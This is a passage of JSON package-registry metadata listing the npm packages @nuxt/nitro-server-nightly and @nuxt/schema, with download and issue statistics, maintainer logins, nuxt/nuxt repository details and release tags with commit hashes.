tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-05-11T14:13:41.968Z","dependent_packages_count":0,"downloads":18898,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":23.660188098908478,"dependent_packages_count":34.13025005858547,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":28.895219078746972},"purl":"pkg:npm/%40nuxt/nitro-server-nightly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/nitro-server-nightly","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/nitro-server-nightly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/nitro-server-nightly/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-11T09:29:38.633Z","issues_count":6017,"pull_requests_count":6878,"avg_time_to_close_issue":11682718.831972789,"avg_time_to_close_pull_request":788508.7928300017,"issues_closed_count":4405,"pull_requests_closed_count":6053,"pull_request_authors_count":594,"issue_authors_count":3408,"avg_comments_per_issue":4.155559248795081,"avg_comments_per_pull_request":2.497092177958709,"merged_pull_requests_count":5387,"bot_issues_count":12,"bot_pull_requests_count":2976,"past_year_issues_count":517,"past_year_pull_requests_count":706,"past_year_avg_time_to_close_issue":614357.4583333334,"past_year_avg_time_to_close_pull_request":247482.47599164926,"past_year_issues_closed_count":264,"past_year_pull_requests_closed_count":479,"past_year_pull_request_authors_count":97,"past_year_issue_authors_count":406,"past_year_avg_comments_per_issue":2.2359767891682787,"past_year_avg_comments_per_pull_request":3.0793201133144477,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":248,"past_year_merged_pull_requests_count":419,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1325,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"Flo0806","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Flo0806"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"}],"active_maintainers":[{"login":"danielroe","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"huang-julien","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"Mini-ghost","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"wattanx","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Flo0806","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Flo0806"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server-nightly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server-nightly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server-nightly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server-nightly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server-nightly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fnitro-server-nightly/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2025-10-16T19:27:37.525Z","updated_at":"2025-10-16T19:27:37.525Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096115,"name":"@nuxt/schema","ecosystem":"npm","description":"Nuxt types and default configuration","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":122,"first_release_published_at":"2021-11-21T16:06:52.604Z","latest_release_published_at":"2026-04-29T23:47:24.169Z","latest_release_number":"4.4.4","last_synced_at":"2026-05-10T18:02:23.572Z","created_at":"2022-04-08T10:39:29.101Z","updated_at":"2026-05-10T18:02:23.573Z","registry_url":"https://www.npmjs.com/package/@nuxt/schema","install_command":"npm install @nuxt/schema","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"4.0.0-alpha.4","rc":"4.0.0-rc.0","3x":"3.21.4","latest":"4.4.4"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha"